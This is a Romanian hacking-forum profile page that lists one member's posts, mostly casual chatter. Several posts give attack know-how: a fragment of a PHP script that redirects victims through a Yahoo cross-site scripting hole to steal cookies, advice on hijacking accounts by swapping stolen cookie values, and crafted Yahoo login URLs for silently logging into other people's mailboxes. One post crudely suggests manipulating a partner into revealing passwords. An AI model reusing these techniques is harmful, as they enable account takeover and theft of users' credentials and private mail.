Jump to content

loki

Active Members
  • Posts

    3545
  • Joined

  • Last visited

  • Days Won

    19

Everything posted by loki

  1. loki

    RST BLOG!

    Nu stiu daca ajuta cu ceva, observ ca daca entry=19" cu ceva in coada adica, nu gaseste blogul cand postez comment, asta inseamna ca nu prea e verificata entry daca e strict numerica. Da abia acu ma uit in cod sa ma bucur si eu
  2. Nu acolo, aici: // DE MODIFICAT DUPA CAZ: $xss='http://music.cn.yahoo.com/search?p='; In ideea ca urmeaza script dupa p=. Am vrut sa separ pentru usurare dar pentru alte xss-uri e bine de umblat si mai jos: </title><script>document.location= poate fi inlocuit deobicei cu "><script>document.location= (</title> are rol doar in acest caz de a optimiza viteza ca sa se execute imediat dupa zona titlu). In concluzie pentru a generaliza codul pentru mai multe xss-uri se pot face modificarile codului asfel: $xss='http://music.cn.yahoo.com/search?p=</title>'; ... if(!$got) { header('Location: '.$xss.'"><script>document.location="... Dar ruperea asta a link-ului a fost facuta doar in scopul unei mai usoare intelegeri a codului. Un xss la alt site il poti folosi similar dar pe situl ala. Trebuie sa stii la ce ai nevoie de cookie-ul de acolo dar in rest nu merge aceeasi metoda, numai la yahoo exista un link de intrare in mail. La altele poti fura cookie si lucra pe cookie-ul tau de pe disc pentru a obtine o sesiune. La neogen de exemplu e un cid= in cookie care odata inlocuit iti garanteaza accesul in cont.
  3. imi place ca daca postam pe youtube in engleza ne batem cu italienii iar in romana cu ungurii. urhgghhh azi am vazut roshu la al doilea film. Incep sa iubesc tiganii si sa urasc italienii
  4. loki

    RST BLOG!

    lol tu dai idei?
  5. wtf azi noapte era cazut, lucreaza la site, ce naiba, ma trimitea la alta adresa din cn.yahoo sa caut muzica acolo.... :shock: sper ca nu lucreaza la patch-uirea lui
  6. a fost patchuit xss-ul. Pana la noi xss-uri asta e...
  7. apropo unele telefoane au optiune in menu de ascunderea numarului si merge pe toate retelele.
  8. consultatia parca e 5 (sau trimiterea la un cabinet pentru analize care iti salta si ei chiar si 20 de roni pe o analiza). Dar poate nu te-a recunoscut, sau nu ai precizat, ca medic de familie intr-adevar stiam ca e gratis. Inscrie-te la alt medic Legat de stampile e reclama aia cu copiatul stampilei cu un ou fiert, oare merge?
  9. doream sa zic de ala cu india dar il uitasem. Intr-adevar atasand &.done= se duce direct in mail. In concluzie: http://edit.india.yahoo.com/config/login?.patner=sbc&passwd=PASSWORD&login=USERNAME&.done=http%3A//us.mg1.mail.yahoo.com/ym/login%3Fymv%3D0 Edit: merge si: http://n16.login.scd.yahoo.com/config?login=USER&passwd=PASSWORD&.done=http://mail.yahoo.com Amadoua merg cu conditia sa nu fii logat, altfel raman in pagina de login Ca sa scapi totusi de problema si sa mearga sigur ii poti da un logoff la userul vechi: https://login.yahoo.com/config/login?logout=1&.pd=c%3d&.direct=1&.done=https%3A//login.yahoo.com/config/login%3f.intl=us%26.patner=sbc%26passwd=PASSWORD%26login=USERNAME%26.done=http%253a//us.mg1.mail.yahoo.com/ym/login%253fymv=0
  10. loki

    Damn Adobe :(

    poate e windoze de vina. Sau daca nu l-ai cumparat... cauta alt crack, mi-a mancat si mie zilele un crack de photoshop.
  11. Recomand, asta am facut vreo 2 ani de zile. Daca te plangi de curent, tii monitorul inchis. Acum am 2 tinute non-stop. Cel mai bun hosting e cel care-i la tine acasa, ai tot controlul asupra lui.
  12. uf eu am glumit da o sa ma injure shinnok ca i-am schimbat ideea postului. PS toti suntem offtopic la un potential viitor ex-user intr-un topic potential viitor recicled
  13. Mai simplu...io futi pe ficasa ......si poate o lasi si bortzoasa... si-i soptesti dulce la ureche sa iti zica parola de hi5 si yahoo spunand ca te excita
  14. dapai ma chinuiam si eu la o faza asemanatoare (doream sa ascund un XSS din sursa paginii), dar a le trimite prin POST inseamna sa le creezi totusi cu niste campuri macar hidden si macar un buton de submit pentru user. Eu aveam nevoie sa trimit prin post direct din php ca sa nu vada userul ce trimit dar nu am gasit sa fie posibil. Totusi exista pagini yahoo care inca primesc cont/parola prin GET pentru un simplut login. Nu am incercat dar poate contin chiar .../done= sau /**http in coada ca sa faca si redirectul dupa login. Apropo presupun ca ai numele userului si parola si vrei logarea invizibila. (OFFTOPIC: pe hi5 merge logare GET: www.hi5.com/email=&password=) PS nu stiu daca ajuta dar intr-o noapte chior de somn am gasit pe yahoo unde sa te inscrii ca sa iti ofere aplicatie de login pentru social networks, gen facebook, hi5 care iti culeg prietenii din mail. Cred insa ca te intreaba la ce iti trebe si te trece deoparte pana sa iti dea aplicatia.
  15. e lipsa de BANI sau vara se iarta ca e canicula si bate in cap la newbi
  16. protectie anti spam. incearca sa nu il trimiti de pe yahoo.
  17. 1. 85. sursa : http://www.bbc.co.uk/romanian/news/story/2008/06/080623_bac_prima_proba.shtml 86. Nesiiiimtiitiilor!!! Care v-ati incercat muschiii!! :shock: hahahhaha :twisted: :twisted: :twisted: :twisted: :twisted:
  18. daca ar fi arestat fiecare creator al fiecarui virus... ne-ar trebui puscarii interplanetare. Doar scopul se acuza, in caz ca intentia este asupra unui anumit obiectiv. ca am primit intrebari relativ la un post de al meu: am cautat disperat dar nu mai am antimanul in comp. Da stiu ca il aveam pe dupa google de undeva. Are 300K virusu ca verificare.
  19. photoshop. Din una veche iti fac una noua. Dar nu recomand, o incaseaza si medicul tau, si tu.
  20. loki

    Staff feedback

    aa nuu, ziceam ca am gasit pe un forum o faza identica: eu deschid, tu postezi "ala de mai sus e asa si asa" urmatorul la fel etc. joc de forum. Ziceam ca: ce legatura are cu sugestiile pentru motorul rst :shock: Shinnok mi-ai facut pofta. 2 min sa-mi iau capshunata din bucatarie PS: hall of fame? exista de mult "cele mai penale" da un search si uita-te la categorii
  21. Pai cred ca stiti ce inseamna castigul din click-uri? Sa zicem 2 centi pe click. De unde ii castigati? De la o companie care incaseaza 2000 dolari pentru a va oferi reclama aia pe site pe care va ofera 2 centi pe click. Asta e publicitatea. Ca e pe internet, ca e in presa (zona de jos a ziarului care nu va intereseaza), clip-urile publicitare de 10 minute pe protv care va calca pe nervi in timpul filmului. Important e ca vine un client sa plateasca aparitia lor. Un parteneriat inseamna "clientii ne vor plati la amandoi" deci castiguri pe masura. Femeia de servici de la google a scos carte: "cum am castigat j-de milioane de dolari" de unde? din actiunile google primite la lansare cand erau doar 40 de oameni concepand un site. Asa se castiga banii mari!
  22. loki

    Staff feedback

    n-are ce cauta la sugestii. Offtopic ca pe alte forumuri. Daca s-ar dechide la offtopic ar merge un "zi ceva de ala dinainte" Unu critica, urmatoru critica pe al dinainte... ... vorba lu Kenpaki: "tu parca aveai ban..." ...
  23. nokia 1100 e si primu e si ultimul nu ma intrebati de ce, desi nu joc fotbal, rezista.
  24. loki

    Nu Inteleg

    ai avut ghinion, deobicei is rare pe aici programele virusate: apar doar in topicurile cerute de idioti. Ca mai iei un troian... e din cauza ca e publicat ca un troian, dar nimeni nu publica un virus aici doar asa ca sa-l ia altul.... ar scadea mandria sitului in acest caz. Dar e posibil sa iei un program care e detectat de antivirus ca fiind ceva malefic. Malefic este, dar virus, nu, in acest caz.
×
×
  • Create New...